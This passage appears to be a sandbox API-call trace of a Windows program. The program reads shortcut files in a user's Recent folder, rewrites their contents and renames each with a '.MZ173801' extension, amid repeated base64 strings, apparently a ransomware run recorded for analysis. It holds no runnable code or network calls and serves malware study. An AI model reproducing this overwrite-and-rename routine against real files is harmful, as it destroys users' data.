lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.759] GetCurrentThreadId () returned 0x1358 [0111.759] GetCurrentThreadId () returned 0x1358 [0111.759] GetCurrentThreadId () returned 0x1358 [0111.760] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\txD8odKDry6.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txd8odkdry6.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.760] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.760] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.760] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x28d [0111.760] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.760] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x28d, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x28d, lpOverlapped=0x0) returned 1 [0111.761] CloseHandle (hObject=0x3f4) returned 1 [0111.761] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\txD8odKDry6.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txd8odkdry6.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.762] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x28d, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x28d, lpOverlapped=0x0) returned 1 [0111.762] CloseHandle (hObject=0x3f4) returned 1 [0111.763] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\txD8odKDry6.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txd8odkdry6.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\txD8odKDry6.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txd8odkdry6.lnk.mz173801")) returned 1 [0111.764] GetCurrentThreadId () returned 0x1358 [0112.023] GetCurrentThreadId () returned 0x1358 [0112.023] GetCurrentThreadId () returned 0x1358 [0112.023] GetCurrentThreadId () returned 0x1358 [0112.023] GetCurrentThreadId () returned 0x1358 [0112.023] GetCurrentThreadId () returned 0x1358 [0112.023] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76520647, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76520647, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x76520647, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a2, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="tXqq.lnk", cAlternateFileName="")) returned 1 [0112.023] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.023] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tXqq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txqq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76520647, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x76520647, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x76520647, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a2)) returned 1 [0112.023] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.023] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.024] GetCurrentThreadId () returned 0x1358 [0112.024] GetCurrentThreadId () returned 0x1358 [0112.024] GetCurrentThreadId () returned 0x1358 [0112.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.024] GetCurrentThreadId () returned 0x1358 [0112.024] GetCurrentThreadId () returned 0x1358 [0112.025] GetCurrentThreadId () returned 0x1358 [0112.025] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tXqq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txqq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.025] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.025] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.025] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4a2 [0112.025] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.025] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x4a2, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x4a2, lpOverlapped=0x0) returned 1 [0112.026] CloseHandle (hObject=0x3f4) returned 1 [0112.026] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tXqq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txqq.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.027] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x4a2, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x4a2, lpOverlapped=0x0) returned 1 [0112.028] CloseHandle (hObject=0x3f4) returned 1 [0112.029] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tXqq.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txqq.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tXqq.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\txqq.lnk.mz173801")) returned 1 [0112.029] GetCurrentThreadId () returned 0x1358 [0112.029] GetCurrentThreadId () returned 0x1358 [0112.029] GetCurrentThreadId () returned 0x1358 [0112.029] GetCurrentThreadId () returned 0x1358 [0112.029] GetCurrentThreadId () returned 0x1358 [0112.029] GetCurrentThreadId () returned 0x1358 [0112.029] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea71cc0e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac2dbb0, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeac2dbb0, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x4a6, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uO40eItURrDuO.lnk", cAlternateFileName="UO40EI~1.LNK")) returned 1 [0112.029] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.029] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.030] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uO40eItURrDuO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\uo40eiturrduo.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea71cc0e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac2dbb0, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeac2dbb0, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x4a6)) returned 1 [0112.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.030] GetCurrentThreadId () returned 0x1358 [0112.030] GetCurrentThreadId () returned 0x1358 [0112.030] GetCurrentThreadId () returned 0x1358 [0112.031] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 